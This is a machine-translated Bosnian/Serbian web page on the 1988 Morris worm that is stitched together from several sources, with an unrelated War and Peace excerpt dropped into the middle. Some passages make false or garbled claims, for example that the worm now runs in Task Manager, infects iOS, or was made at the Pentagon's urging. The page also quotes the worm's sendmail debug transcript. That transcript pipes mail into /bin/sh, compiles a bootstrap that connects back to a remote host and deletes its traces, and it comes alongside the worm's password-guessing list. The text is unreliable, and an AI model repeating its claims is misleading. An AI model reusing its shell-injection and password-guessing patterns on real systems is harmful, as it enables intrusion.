Napisao Cornell diplomirani student Robert Tappan Morris, a lansiran 2. novembra 1988.
Bio je to prvi virus koji je dobio značajnu pažnju u medijima masovni medij. To je također rezultiralo prvom osudom u Sjedinjenim Državama prema Zakonu o kompjuterskim prijevarama i zloupotrebama iz 1986. godine.
Istorija izgleda
Sam Morris je programski kod držao u tajnosti, i malo je vjerovatno da bi iko mogao dokazati njegovu umiješanost. Međutim, njegov otac, kompjuterski stručnjak u Agenciji za nacionalnu sigurnost, smatrao je da je najbolje da njegov sin sve prizna.
Na suđenju Robertu Morisu je prijećena kazna do pet godina zatvora i novčana kazna od 250.000 dolara, međutim, uzimajući u obzir olakšavajuće okolnosti, sud ga je osudio na tri godine uslovne, 10.000 dolara novčane kazne i 400 sati rada za opće dobro.
Epidemija je pokazala koliko je opasno bezuslovno vjerovati kompjuterske mreže. Nakon toga su razvijeni novi stroži standardi kompjuterska sigurnost vezano za sigurnost programskog koda, administraciju mrežnih čvorova i izbor sigurnih lozinki.
Napišite recenziju članka "Morris Worm"
Linkovi
Odlomak koji karakteriše Morrisovog crva
- Zašto odlaziš? Zašto si uznemiren? Zašto?..” upitala je Nataša Pjera gledajući ga prkosno u oči."Zato što te volim! - hteo je da kaže, ali nije rekao, pocrveneo je dok nije zaplakao i spustio oči.
- Zato što je bolje da te rjeđe posjećujem... Jer... ne, samo imam posla.
- Iz onoga što? ne, reci mi”, počela je Nataša odlučno i odjednom ućutala. Oboje su se pogledali u strahu i zbunjenosti. Pokušao je da se naceri, ali nije mogao: njegov osmeh je izražavao patnju, on joj je nečujno poljubio ruku i otišao.
Pjer je odlučio da više ne posećuje Rostovove sa sobom.
Petja je, nakon što je dobio odlučno odbijanje, otišao u svoju sobu i tamo, zaključavši se od svih, gorko zaplakao. Sve su radili kao da ništa nisu primetili, kada je došao na čaj, ćutljiv i sumoran, suzama uprljanih očiju.
Sutradan je stigao suveren. Nekoliko rostovskih dvorišta tražilo je da odu i vide cara. Tog jutra Petja je dugo trebalo da se obuče, počešlja i sredi kragne poput velikih. Namrštio se ispred ogledala, gestikulirao, slegnuo ramenima i na kraju, ne govoreći nikome, stavio kapu i izašao iz kuće sa zadnjeg trijema, trudeći se da ga ne primijeti. Petja je odlučio da ode pravo na mesto gde se nalazio suveren i direktno objasni nekom komorniku (Peti se činilo da je suveren uvek okružen komornicima) da on, grof Rostov, uprkos svojoj mladosti, želi da služi otadžbini, da mladost nije mogla biti prepreka za odanost i da je spreman... Petja je, dok se spremao, pripremio mnogo divnih riječi koje bi rekao komorniku.
Petya je računao na uspjeh svog predstavljanja suverenu upravo zato što je bio dijete (Petya je čak mislio kako će se svi iznenaditi njegovoj mladosti), a istovremeno, u dizajnu ovratnika, u frizuri i u njegovoj staložen, spor hod, hteo je da se predstavi kao starac. Ali što je dalje išao, više su ga zabavljali ljudi koji su dolazili i odlazili u Kremlj, sve je više zaboravljao da primeti staloženost i sporost karakterističnu za odrasle ljude. Približavajući se Kremlju, već je počeo paziti da ga ne uguraju i odlučno, prijetećim pogledom, ispružio je laktove u bokove. Ali kod Trojice kapije, uprkos svoj njegovoj odlučnosti, ljudi koji verovatno nisu znali sa kojim patriotskim ciljem ide u Kremlj, toliko su ga pritisnuli uza zid da se morao pokoriti i zaustaviti do kapije uz zujanje ispod lukovi zvuk kočija koje prolaze. U blizini Petje stajala je žena s lakejem, dva trgovca i penzionisani vojnik. Pošto je neko vreme stajao na kapiji, Petja je, ne čekajući da prođu sve kočije, hteo da krene ispred ostalih i počeo je odlučno da radi laktovima; ali žena koja je stajala nasuprot njemu, u koju je prvo uperio laktove, ljutito je viknula na njega:
- Šta, barčuk, guraš, vidiš - svi stoje. Zašto se onda penjati!
„Tako da će svi ući“, rekao je lakaj i, takođe počevši da radi laktovima, stisnuo Petju u smrdljivi ugao kapije.
Petja je rukama obrisao znoj koji mu je prekrivao lice i popravio ogrlice natopljene znojem, koje je tako dobro sredio kod kuće, kao one velike.
Petya je osjećao da ima nepredstavljiv izgled i bojao se da mu, ako se tako predstavi komornicima, neće biti dopušteno da vidi suverena. Ali nije bilo načina da se oporavim i preselimo na drugo mjesto zbog skučenih uslova. Jedan od generala u prolazu bio je poznanik Rostovovih. Petja je htela da ga zamoli za pomoć, ali je mislila da bi to bilo u suprotnosti sa hrabrošću. Kada su sve kočije prošle, gomila se navalila i iznijela Petju na trg, koji je bio potpuno okupiran ljudima. Ne samo u okolini, nego i na padinama, na krovovima, ljudi je bilo posvuda. Čim se Petja našao na trgu, jasno je čuo zvuke zvona i radosne narodne priče koji su ispunjavali čitav Kremlj.
Nekada je trg bio prostraniji, ali odjednom su im se sve glave otvorile, sve je pojurilo negdje naprijed. Petja je bio stisnut da nije mogao da diše, a svi su vikali: „Ura! Ura! Petja je stajao na prstima, gurao, štipao, ali nije mogao ništa da vidi osim ljudi oko sebe.
Postojao je jedan zajednički izraz nježnosti i oduševljenja na svim licima. Žena jednog trgovca, koja je stajala pored Petje, jecala je, a suze su joj tekle iz očiju.
- Oče, anđeo, oče! – rekla je brišući suze prstom.
Amerika je bila šokirana kada su se 2. novembra 1988. godine skoro svi računari koji su imali pristup internetu (u Americi) smrznuli, kako kažu, oko osam sati ujutru. U početku se to pripisivalo kvarovima u elektroenergetskom sistemu. Ali onda, kada se dogodila epidemija uzrokovana Morrisovim crvom, postalo je jasno da je terminale napao program nepoznat u to vrijeme, koji je sadržavao kod koji se nije mogao dešifrirati postojećim sredstvima. Nije iznenađujuće! U to vrijeme, računari povezani na Internet brojali su samo desetine hiljada (otprilike 65.000 terminala) i uglavnom su bili ograničeni na vladu ili lokalnu vlast.
Morris Worm virus: šta je to?
Sam tip je bio prvi takve vrste. Upravo je on postao osnivač svih drugih programa ovog tipa, koji se danas prilično razlikuju od praoca.
Robert Moris je stvorio svog "crva" a da nije ni slutio koliko će popularnost dobiti i kakvu štetu može da nanese ekonomiji. Općenito se vjeruje da je to bio, kako se sada kaže, čisto sportski interes. Ali zapravo, uvod u ono tada globalna mreža APRANET, na koji su, inače, bile povezane i vladine i vojne organizacije, izazvao je toliki šok da se Amerika dugo nije mogla oporaviti. By preliminarne procjene kompjuterski virus Morris Worm je prouzročio oko 96,5 miliona dolara štete (a ovo je samo iznos koji se zna iz zvaničnih izvora). Gore navedeni iznos je zvaničan. A ono što nije uzeto u obzir vjerovatno se ne može otkriti.
Tvorac kompjuterskog virusa "Morris Worm" Robert Morris: neke činjenice iz njegove biografije
Odmah se postavlja pitanje ko je bio taj genijalni programer koji je nekoliko dana uspeo da parališe kompjuterski sistem severnoameričkog kontinenta.
Isti ugledni izvor Wikipedia ukazuje da je Robert svojevremeno bio diplomirani student na Univerzitetu Cornell R. T. Morris (slučajnost ili slučajnost?), na fakultetu kompjuterska tehnologija.
Istorija nastanka i pojave virusa
Vjeruje se da virus u početku nije sadržavao nikakvu prijetnju. Fred Cohen je proučavao "Morisovog crva" na osnovu svojih otkrića o zlonamjernih kodova i otkriveno u njemu zanimljiva karakteristika. Ispostavilo se da uopće nije riječ o zlonamjernom programu.
Morris Worm (iako se danas općenito smatra virusom na poticaj Pentagona) je prvobitno kreiran kao sredstvo za testiranje ranjivosti sistema zasnovanih na intranetu (nije iznenađujuće da su korisnici APRANET-a prvi nastradali).
Kako virus utiče na računarski sistem?
Sam Robert Morris (tvorac virusa) na sve moguće načine negira posljedice koje je njegovo "dete" izazvalo Sjedinjenim Državama, tvrdeći da je širenje preko mreže uzrokovano greškom u kodu samog programa. S obzirom da je školovanje stekao na fakultetu, posebno na Fakultetu računarskih nauka, teško je složiti se sa ovim.
Dakle, takozvani "Morris Worm" u početku je bio usmjeren na presretanje poruka između velikih organizacija (uključujući vladu i vojsku). Suština uticaja je bila da se zameni originalni tekst pismo poslano u to vrijeme na APRANET mreži, sa uklonjenim zaglavljima i završecima u Sendmail načinu za otklanjanje grešaka ili kada je bafer mrežnog servisa prepuna. Prvi dio novog slova sadržavao je kod kompajliran na udaljenom terminalu, a treći se sastojao od istog binarni kod, ali prilagođen za različite računarske sisteme.
Osim toga, korišten je specijalizirani alat koji je omogućio odabir prijava i lozinki pomoću njih daljinski pristup za izvršavanje programa (rexec), kao i pozivanje udaljenog tumača (rsh), koji je na nivou komande koristio takozvani „mehanizam poverenja“ (sada više povezan sa sertifikatima).
Brzina širenja
Kako se ispostavilo, kreator virusa uopšte nije bio glupa osoba. Odmah je shvatio da što je šifra duža duži virus je implementiran u sistem. Zbog toga dobro poznati “Morris Worm” sadrži minimalnu binarnu (ali kompajliranu) kombinaciju.
Zbog toga se dogodio upravo taj bum, o kojem se iz nekog razloga sada obično šuti na nivou državnih obavještajnih službi, iako se prijetnja samokopiranja širila gotovo eksponencijalno (svaka kopija virusa bila je sposobna stvoriti dvije ili više sopstveni analozi).
Šteta
Niko, međutim, ne razmišlja o tome kakva bi šteta mogla biti nanesena istom sigurnosnom sistemu. Problem je u tome što je sam kompjuterski virus Morris Worm. Činjenica je da je u početku, prilikom prodora na korisnički terminal, virus morao da utvrdi da li sistem sadrži njegovu kopiju. Ako je i postojao, virus je ostavio auto na miru. Inače je uveden u sistem i kreiran sopstveni klon na svim nivoima korišćenja i upravljanja. Ovo se odnosilo na sve operativni sistem uopšteno i uspostavljeno korisničkih programa, i aplikacije ili apleti.
Zvanična brojka koju navodi Ministarstvo SAD (otprilike 96-98 miliona dolara štete) je očigledno potcijenjena. Ako pogledate samo prva tri dana, već je bilo oko 94,6 miliona). Narednih dana iznos nije toliko narastao, ali su patili obični korisnici (zvanična štampa i američko ministarstvo o tome šute). Naravno, u to vrijeme je broj kompjutera spojenih na globalni web, iznosio je oko 65 hiljada samo u SAD, ali je skoro svaki četvrti terminal bio pogođen.
Posljedice
Nije teško pretpostaviti da je suština uticaja da se sistem potpuno liši funkcionalnosti na nivou potrošnje resursa. Ovo se uglavnom odnosi na mrežne veze.
Sam virus jednostavan slučaj stvara kopije sebe i inicira pokretanje procesa koji se maskiraju kao sistemske usluge(sada čak radi i kao administrator na listi procesa Upravitelja zadataka). I nije uvijek moguće ukloniti prijetnje sa ove liste. Stoga, kada prekidate procese povezane sa sistemom i korisnikom, morate djelovati krajnje oprezno.
Šta je sa Morrisom?
"Morris Worm" i njegov tvorac ovog trenutka osećaju se veoma dobro. Sam virus je uspješno izolovan naporima istih antivirusne laboratorije, budući da imaju izvorni kod u kojem je napisan aplet.
Moris je 2008. najavio izdavanje Arc jezika, zasnovanog na Lips, a 2010. je postao nominovan i dobitnik Weiser nagrade.
Usput, još jedan zanimljiva činjenica je da je državni tužilac Mark Rush priznao da je virus onesposobio mnoge računare prinudni raskid radi, ali ipak nije namjerno oštetio korisničke podatke na bilo kojem nivou, budući da u početku nije bio destruktivan program, već pokušaj testiranja mogućnosti ometanja unutrašnja struktura postojeći sistemi. U poređenju sa onim sa čime se napadač (koji se dobrovoljno predao vlastima) u početku suočio zatvor do pet godina i 250.000 dolara kazne, dobio je tri godine uslovne kazne, 10.000 dolara kazne i 400 sati društveno korisnog rada. Kao što su mnogi advokati tog vremena (usput, a i sadašnjih) mislili, ovo je besmislica.
Nekoliko rezultata
Naravno, danas se plašimo takve prijetnje, koja se pojavila u ranim fazama njenog nastanka kompjuterska oprema predstavljao "Morris Virus", naravno, ne vredi.
Ali evo šta je zanimljivo. Vjeruje se da su Windows operativni sistemi uglavnom pogođeni zlonamjernim kodovima. A onda se odjednom ispostavi da je tijelo virusa prvobitno razvijeno za UNIX sisteme. Šta to znači? Jedino što je vrijeme da vlasnici Linuxa i Mac OS-a, koji su u osnovi bazirani na UNIX platformi, pripreme sredstva zaštite (iako se vjeruje da virusi uopće ne djeluju na ove OS-ove, u smislu da su nije napisano). Ovo je mjesto gdje mnogi korisnici Maca i Linuxa duboko griješe.
Kako se ispostavilo, čak i na mobilne platforme ispod iOS kontrola Neke prijetnje (uključujući Morrisovog crva) počele su manifestirati svoju aktivnost. Prvo je reklama, pa onda... nepotreban softver, onda... - pad sistema. Ovdje ne možete ne razmišljati. Ali u korijenu svega toga bio je neki diplomirani student koji je napravio grešku u svom vlastitom programu za testiranje, što je dovelo do pojave onoga što se danas obično naziva kompjuterskim crvima. I, kao što znate, njihovi principi uticaja na sisteme su nešto drugačiji.
U određenom smislu, takvi virusi postaju špijuni (špijunski softveri), koji ne samo da preopterećuju sistem, već pored svega kradu pristupne lozinke, logine, PIN kodove kreditnih ili debitnih kartica i bogzna šta još. redovni korisnik možda i ne shvataju. Općenito, utjecaj ovog virusa i njemu sličnih u ovoj fazi razvoja kompjuterska tehnologija je prepuna prilično ozbiljnih posljedica, unatoč čak i većini savremenim metodama zaštita. I to upravo u odnosu kompjuterski crvi treba da budete što je moguće oprezniji.
Ovo je tako zabavna i neobična priča koja se neće zaboraviti još dugo. Provedite zanimljivo i sigurno vrijeme na mreži - bez krađe podataka, preopterećenja sistema i špijuna poput Morrisovog crva!
2. novembra 1988. ARPANET mrežu je napao program koji je kasnije postao poznat kao “Morris crv” – nazvan po svom kreatoru, studentu Univerziteta Cornell Robertu Morrisu Jr. ARPANET (Mreža agencija za napredne istraživačke projekte) stvorena je 1969. godine na inicijativu Agencije za napredne istraživačke projekte Ministarstva odbrane SAD (DARPA, Defense Advanced Research Projects Agency) i bila je prototip Interneta. Ova mreža je stvorena u interesu istraživača u oblasti računarstva i tehnologije za razmenu poruka, kao i programa i skupova podataka između najvećih istraživačkih centara, laboratorija, univerziteta, vladine organizacije i privatne firme koje obavljaju poslove u interesu Ministarstva odbrane SAD (DoD, Department of Defence of USA). Na zahtjev Ministarstva odbrane razvijen je jedan od tri najčešća protokola transportnog sloja OSI modela, nazvan TCP/IP, koji je 1983. postao glavni u ARPANET-u. Do kraja 80-ih, mreža se sastojala od nekoliko desetina hiljada računara. ARPANET je prestao da postoji u junu 1990.
Morrisov crv je bio prvi primjer zlonamjernog softvera u istoriji kompjuterske tehnologije. softver, koji je koristio mehanizme automatskog širenja mreže. U tu svrhu korišteno je nekoliko ranjivosti mrežnih servisa, kao i neke slabe tačke kompjuterski sistemi, zbog nedovoljne pažnje sigurnosnim pitanjima u to vrijeme.
Prema Robertu Morrisu, crv je stvoren u istraživačke svrhe. Njegov kod nije sadržavao nikakav "korisni teret" (destruktivne funkcije). Međutim, zbog grešaka u algoritmima rada, širenje crva izazvalo je takozvano „uskraćivanje usluge“, kada su računari bili zauzeti izvršavanjem brojnih kopija crva i prestali da odgovaraju na komande operatera. Morrisov crv je praktično paralizovao rad računara na ARPANET mreži do pet dana. Procijenjeno vrijeme zastoja je najmanje 8 miliona sati i preko 1 milion sati utrošenog na vraćanje sistema u funkciju. Ukupni gubici u monetarnom smislu procijenjeni su na 98 miliona dolara, koji se sastoje od direktnih i indirektnih gubitaka.
Uključeni direktni gubici (32 miliona dolara):
zaustavljanje, testiranje i ponovno pokretanje 42.700 mašina;
identifikacija crva, uklanjanje, čišćenje memorije i restauracija 6200 mašina;
analiza koda crva, rastavljanje i dokumentacija;
popravljanje UNIX sistema i testiranje.
Uključeni indirektni gubici (66 miliona dolara):
gubitak vremena na računaru zbog nedostatka pristupa mreži;
gubitak korisničkog pristupa mreži.
Međutim, ove procjene moraju biti tretirane vrlo, vrlo pažljivo.
Strukturno, crv se sastojao od tri dijela - "glave" i dva "repa". “Glava” je bio C izvorni kod (99 linija) i kompajliran je direktno na udaljenoj mašini. "Repovi" su bili identični, sa stanovišta izvorni kod i algoritmi, binarne datoteke, ali sastavljen pod različite vrste arhitektura Prema Morrisovom planu, VAX i SUN su odabrani kao ciljne hardverske platforme. "Glava" je bačena na sljedeće metode:
- korištenje načina za otklanjanje grešaka u sendmailu;
- iskorištavanje ranjivosti prekoračenja bafera u fingerd mrežnom servisu;
- izbor logina i lozinke za daljinsko izvršenje programi (rexec);
- pozivanje daljinskog tumača komandi (rsh) pogađanjem korisničkog imena i lozinke ili korištenjem mehanizma povjerenja.
debug
pošta od:
rcptto:<"|sed-e "1,/^$/d" | /bin/sh; exit 0">
podaci
cd /usr/tmp
mačka >x14481910.c<<"EOF"
<текст программы l1.c>
EOF
cc -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
odustati
Kao što vidite, zaglavlja su uklonjena iz tijela slova (pomoću pretprocesora sed teksta) i sačuvana je datoteka izvornog koda „glava“. Zatim, komandni procesor je dobio instrukcije da kompajlira "glavni" kod, pokrene rezultirajuću izvršnu datoteku i izbriše privremene datoteke.
Da bi iskoristio ranjivost fingerd servisa, crv je prenio posebno pripremljen niz od 536 bajtova, koji je na kraju nazvao funkciju execve("/bin/sh", 0, 0). Ovo je radilo samo za VAX računare koji koriste 4.3BSD; SUN računari koji koriste SunOS nisu imali ovu ranjivost.
Za korištenje metoda distribucije rexec i rsh, prikupljena je lista lokalnih korisnika računala. Na osnovu toga su odabrane najčešće korišćene lozinke, u nadi da mnogi korisnici imaju ista imena i lozinke na svim mašinama na mreži, što se, međutim, pokazalo da nije daleko od istine. Pored selekcije, rsh je koristio mehanizam povjerenja, ili na drugi način pojednostavljeni mehanizam provjere autentičnosti zasnovan na IP adresi udaljene mašine. Takve adrese su pohranjene u /etc/hosts.equiv i .rhosts fajlovima. Za većinu računara poverenje je bilo obostrano, tako da je sa velikim stepenom verovatnoće lista IP adresa ovih datoteka koje je crv pronašao omogućila prijavu na udaljeni sistem preko rsh-a bez upotrebe lozinke.
Prilikom pretraživanja, crv je isprobao sljedeće opcije lozinke:
- prazan;
- korisničko ime (korisnik);
- korisničko ime napisano unatrag (resu);
- dvostruko ponavljanje korisničkog imena (korisnik);
- ime ili prezime korisnika (John, Smith);
- ime ili prezime korisnika malim slovima (john, smith);
- ugrađeni rečnik od 432 reči;
- fajl /usr/dict/words, koji sadrži oko 24.000 reči i koristi se na 4.3BSD (i drugima) kao pravopisni rečnik. Ako riječ počinje velikim slovom, tada je provjerena i verzija s malim slovom.
Crv je koristio nekoliko tehnika kako bi kompjuterskim administratorima otežao otkrivanje:
- brisanje izvršne datoteke nakon pokretanja;
- sve poruke o grešci su onemogućene, a veličina ispisa o padu je postavljena na nulu;
- izvršna datoteka crva je sačuvana pod imenom sh, istim imenom koje koristi tumač komandi Bourne Shell, čime je crv sakriven na listi procesa;
- otprilike svake tri minute, podređena nit je pokrenuta i roditeljska nit je prekinuta, što je trajno promijenilo pid procesa crva i resetiralo vrijeme rada prikazano na listi procesa;
- svi tekstualni nizovi su kodirani pomoću operacije xor 81h.
Incident sa “Morris crvom” natjerao je IT stručnjake da ozbiljno razmisle o sigurnosnim pitanjima, a posebno nakon toga, da bi se povećala sigurnost sistema, korištenje pauza nakon pogrešnog unosa lozinke i pohranjivanje lozinki u /etc/shadow, gde su prebačeni iz čitljivog statusa, počeli su da se uvode svi korisnici /etc/passwd. Ali najvažniji događaj bilo je stvaranje u novembru 1988. CERT Koordinacionog centra (CERT/CC), čije su aktivnosti vezane za rješavanje problema internet sigurnosti. Prvi CERT sigurnosni bilten koji se pojavio u decembru 1988. izvještavao je o ranjivostima koje je crv iskoristio. Važno je napomenuti da su mnoga tehnička rješenja koja koristi Morris crv, kao što je korištenje grube sile lozinke, kompajliranje koda pokretača na udaljenom računaru koji pokreće *NIX sisteme (Slapper), skeniranje mreže da bi se identificirali ciljevi, itd. Koriste se i u modernim primjerima zlonamjernog softvera.
Zanimljivo je da se te iste 1988. poznati programer Peter Norton prilično oštro u štampi izjasnio protiv same činjenice postojanja kompjuterskih virusa, nazivajući ih „mitom“ i upoređujući buku oko ove teme sa „pričama o krokodilima“. živi u kanalizaciji New Yorka.” Samo dvije godine nakon Nortonove objave, 1990. godine, objavljena je prva verzija antivirusnog programa Norton AntiVirus.
I na kraju - 1988. godine, impresionirana napadom Morris crva, Američko udruženje za kompjutersku opremu proglasilo je 30. novembar Međunarodnim danom kompjuterske sigurnosti, koji se obilježava do danas.
Program, koji je napisao Robert Morris, imao je mali rečnik najpoznatijih lozinki, što je obezbedilo da prodre u 10 odsto računara povezanih na ARPANET. Jednom na stranom računaru, prva stvar koju je program uradio je da proveri da li je isti program već instaliran tamo. Ako je računar i dalje bio „čist“, program je maskirao svoje prisustvo u sistemu, čitao fajl koji je sadržao informacije o korisnicima „okupiranog“ sistema, poslao ove informacije autoru, a zatim pokušao da se kopira na druge računare koji bili "prijateljski" prema ovome. Činilo se da program "puzi" s jednog računara na drugi. Zbog toga je kasnije dobio naziv „Morisov crv“, ili čak „Veliki crv“. Pa, ovo je po analogiji sa epom J. Tolkiena, gdje je postojao takav lik.
Da je sve išlo glatko, student R. Morris ne bi postao samo vlasnik baze podataka svih korisnika svih kompjutera povezanih na globalnu mrežu u to vrijeme. Koristeći “rupe” koje je pronašao u sistemu, mogao je modificirati već instalirane programe. I, na primjer, postati "vladar svijeta", iako kompjuterski, kontrolirajući rad bilo kojeg od 60 hiljada kompjutera raštrkanih po Sjedinjenim Državama. Nije slab!
Međutim, na sreću kompjuterske zajednice (a i Morrisa Jr., kako se ispostavilo), greška se uvukla u program koji je napisao učenik. "Morisovi crvi" bi se morali uraditi samo jednom. Zapravo, počeli su da se razmnožavaju na svakom od zaraženih računara. Kao rezultat toga, 2. novembra 1988. zamrznulo se najmanje deset posto računara povezanih na globalnu mrežu. Uobičajeni način rješavanja mnogih problema s računarom, ponovno pokretanje, nije uspio. Crvi nisu nestali sa zaraženog računara.
Nakon hipoteze da Rusi napadaju njihov kompjuter, sistem administratori su ozbiljno počeli da analiziraju nastalu nevolju, komunicirajući sa kolegama. Najčešće telefonom. E-pošta je bila praktično blokirana zbog kvarova na računaru. Generalno, kasniji proračuni su pokazali da je šteta od Morrisovog crva iznosila više od 96 miliona dolara. Vijesti o zlonamjernom kompjuterskom programu čak su se pojavile na naslovnim stranicama novina u posljednjim danima predsjedničke trke 1988.! Ali baš kako se pojavio, tako je i nestao. Premalo je Amerikanaca u to vrijeme znalo šta je kompjuter.
Za samo dva dana, zajednički napori kompjuterskih stručnjaka dali su rezultate. Morisov crv je otkriven i njegov kod je dešifrovan. Malo je vjerovatno da je Robert Tappan Morris patio od iluzija veličine. Nije ostavio svoje ime u šifri. Ali, nakon što je vidio šta je uradio program koji je napravio, pokušao je preko trećih strana da komunicira kako da se nosi s tim. A onda je, očigledno, nakon konsultacija sa ocem, koji je radio, između ostalog, u kompjuterskoj bezbednosti, otišao da se preda FBI. Tokom ispitivanja, on je čvrsto insistirao da je "crva" napisao u istraživačke svrhe, a ni u kom slučaju za sabotažu. Kao rezultat toga, kada je slučaj došao na sud, dobio je relativno blagu kaznu: tri godine uslovne kazne, 10.000 dolara novčane kazne i 400 sati društveno korisnog rada.
Suprotno popularnim legendama, osoba koja je danas osuđena za hakovanje teško da će naći posao u kompjuterskoj industriji, posebno u oblasti računarske bezbednosti. Slično kao što porno zvijezda neće biti primljena u Hollywood čak ni za epizodne uloge. Ali ovdje je R. Morris Jr. imao sreće. Postao je doktor nauka i ostvario dobru karijeru u oblasti kompjutera i interneta. Tvorac prvog kompjuterskog crva još uvijek predaje na Massachusetts Institute of Technology.
Kako je pojava „Morisovog crva“ uticala na kompjutersku zajednicu? Prvo, ovo društvo je bilo šokirano razmjerom onoga što se dogodilo. I drugo, zato što je to uradio neko od “naših”. Poduzete su ozbiljne mjere sigurnosti. Prije svega, sistem administratori su shvatili. Postalo je nemoguće (ili gotovo nemoguće) ući u sistem jednostavnim odabirom ključa.
Odazvali su se ne samo sistemski administratori, već i obični administratori. Uz znanje američke vlade, 30. novembra 1988. osnovan je Tim za kompjuterske hitne slučajeve (CERT). Uključivao je najistaknutije američke stručnjake iz oblasti računarstva i prakse. Ova grupa je, na ovaj ili onaj način, učestvovala u odbijanju svih manje ili više velikih napada na računare i globalnu mrežu. Njen rođendan predložen je međunarodnoj zajednici kao .
Distribuirano putem interneta. Napisao Cornell diplomirani student Robert Tappan Morris, a lansiran 2. novembra 1988.
Bio je to prvi virus koji je dobio značajnu pažnju u medijima. To je također rezultiralo prvom osudom u Sjedinjenim Državama prema Zakonu o kompjuterskim prijevarama i zloupotrebama iz 1986. godine.
Istorija izgleda
Prema autorovom planu, crv je trebalo da zarazi samo VAX računare sa operativnim sistemima 4BSD i Sun 3. Međutim, prenosivi C kod dao je crvu mogućnost da radi na drugim računarima.
Posljedice
Šteta od Morrisovog crva procijenjena je na približno 96,5 miliona dolara.
Sam Morris je programski kod držao u tajnosti, i malo je vjerovatno da bi iko mogao dokazati njegovu umiješanost. Međutim, njegov otac, kompjuterski stručnjak u Agenciji za nacionalnu sigurnost, smatrao je da je najbolje da njegov sin sve prizna.
Na suđenju Robertu Morisu je prijećena kazna do pet godina zatvora i novčana kazna od 250.000 dolara, međutim, uzimajući u obzir olakšavajuće okolnosti, sud ga je osudio na tri godine uslovne, 10.000 dolara novčane kazne i 400 sati rada za opće dobro.
Epidemija je pokazala koliko je opasno bezuslovno vjerovati kompjuterskim mrežama. Nakon toga su razvijeni novi, stroži standardi kompjuterske sigurnosti u pogledu sigurnosti programskog koda, administracije mrežnih čvorova i odabira sigurnih lozinki.
Osnova ove stranice je na Wikipediji. Tekst je dostupan pod licencom CC BY-SA 4.0. Netekstualni mediji su dostupni pod vlastitim licencama. Wikipedia® je registrovani zaštitni znak Wikimedia Foundation, Inc.
